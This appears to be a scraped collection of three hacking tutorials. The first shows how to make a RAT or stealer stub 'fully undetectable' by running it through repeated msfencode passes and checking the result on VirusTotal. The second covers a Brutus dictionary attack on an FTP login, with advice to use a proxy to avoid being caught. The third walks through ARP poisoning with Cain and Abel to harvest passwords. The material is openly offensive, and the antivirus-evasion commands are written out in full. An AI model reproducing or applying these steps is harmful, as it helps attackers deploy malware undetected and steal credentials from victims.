0 How to FUD a RAT stub with Backtrack

Requirements:-

1. Backtrack Operating System
2. MSF encoders

So, our first step is to create a virus file with any of the tools like RAT, stealers, botnets, payload or anything. To make it FUD (Fully Undetectable), we use backtrack. Before going to FUD check your file with ant viruses at virustotal.com and we get a detection ratio for example lets say 30/44
Now start terminal in Backtrack and navigate to the directory where your file is located.
E.g. cd Desktop
So our first step is to change the permissions of that file (775) by typing this command
root@bt:~/Desktop# chmod 775 stub.exe
Further type this command to encode your virus,
root@bt:~/Desktop# msfencode -i /root/Desktop/Server.exe -t raw -o
/root/Desktop/stub2.exe -e x86/shikata_ga_nai -c 10
You’ll notice Antivirus still detected it even though we encoded it 10 times with
“x86/shikata_ga_nai” encoder.
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server2.exe
Now 2nd time, we use another encoder named as “jmp_call_additive”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server2.exe -t raw -o
/root/Desktop/Server3.exe -e x86/jmp_call_additive -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server3.exe
Now again we use another encoder named as “call4_dword_xor”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server3.exe -t raw -o
/root/Desktop/Server4.exe -e x86/call4_dword_xor -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 server4.exe
Now final we encode again with this encoder “shikata_ga_nai”
root@bt:~/Desktop# msfencode -i /root/Desktop/Server4.exe -o
/root/Desktop/final.exe -e x86/shikata_ga_nai -c 1
Now again change the permissions of this output file,
root@bt:~/Desktop# chmod 775 final.exe

1 Hack password using BRUTUS (dictionary attack method)

Hack password using BRUTUS 

(dictionary attack method) 

 INTRODUCTION:-

   A dictionary attack is when a text file full of commonly used passwords, or a 
list of every word from the dictionary is used against a password database. Strong 
passwords usually aren't vulnerable to this kind of attack. In the following 
example, I will use Brutus, a very common password cracker, to show a dictionary 
attack against an ftp server. Brutus is a Windows only program, but at the end of 
this chapter I will list a couple more password crackers, some of which are made 
for Mac, Windows, and Linux. 

TUTORIALS:-

1. First the hacker would choose a target. In this case it’s my home 
computer and the IP address for your home computer is 127.0.0.1 . 


2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and 
password. 

3. Next the hacker would launch  Brutus and attempt 
to crack the password. 

4. In the target you put the IP address of the website and to the right 
select the appropriate option, which in this case is FTP. 

5. The default port is 21 but some websites change this to make them a 
little more secure. If you find out that the port isn’t 21, you can find the 
right one by doing a port scan. We will get into this later in the book. 

6. If you don’t know any of the usernames for the FTP server, then you will 
have to get a list of the most common usernames. 

7. For a dictionary attack you will have to choose the pass mode Word List 
and browse and select the file containing your word list. You can get 
some good password lists at 
http://packetstormsecurity.com/Crackers/wordlists/

 Below are 
examples of what a username and password list might look like. 

8. Once you hit Start the program will attempt to connect to the server and 
begin to try all the possible combinations from your lists. 

9. If you’re lucky, eventually it’ll get the right Username:Password 
combination. As you can see below, it got the correct combination of 
username – admin and password – password. 

10. A smarter hacker would use a proxy when using a program like this. 
What a proxy does is cloaks your IP address by sending your connection 
request through another computer before going to the target. This is a 
smart idea because as you will see in the image below, Brutus leaves a 
huge log of your presence on the target server.

In place of the IP address 127.0.0.1 would be the hackers IP address. 
Footprints like these get a hacker caught and into a lot of trouble with 
the law. 

0 ARP Poisoning Attack using Cain and abel to get password

ARP Stands for Address Resolution Protocol. It is used to map IP addressing to MAC addresses in a local area network segment where hosts of the same subnet reside. In an ARP poisoning attack the hacker places him in between the router and server and steal all kind of passwords.

The following diagram will help you to understand the concept behind the ARP Poisoning attack.

Normally the data is exchanged between the user and router and the router will sent the information to the server, which will allow you to login. In an ARP Poisoningattack the hacker will place him between the server/Router and the user/Victim andtherefore steal your private data.

Below I will show you how a hacker can Implement an ARP Poisoning attack and steal your passwords using Cain and abel.

1. First of all Open Cain and abel. You can download it by                 clicking here .

   
2. Once you have opened Cain and Abel, go to "Configure" at the       top, and select the Adapter that you use to connect to the internet     (WiFi card).


3. Now Click on the Sniffer tab and click on Nuclear yellow button just below the
File button.(This will start Sniffing)

4. Now press the blue “+” Sign.
       
     

5. A window will popup, make sure “All host in my subnet” is           selected, and then click on OK button

6. This will find all the active computers on your network.
   

7. Now goto APR tab at the bottom

8. Press the blue "+" sign again and select the IP of your router, all       IPs connected to it will be prompted at the right side column,           select the ones you want to intercept.

9. Then just press "OK", now press the yellow nuclear sign to start      the ARP poisoning.

10. Now leave it for Few minutes. After some time go to Password       tab at the bottom to view the passwords you have collected.

Watch this video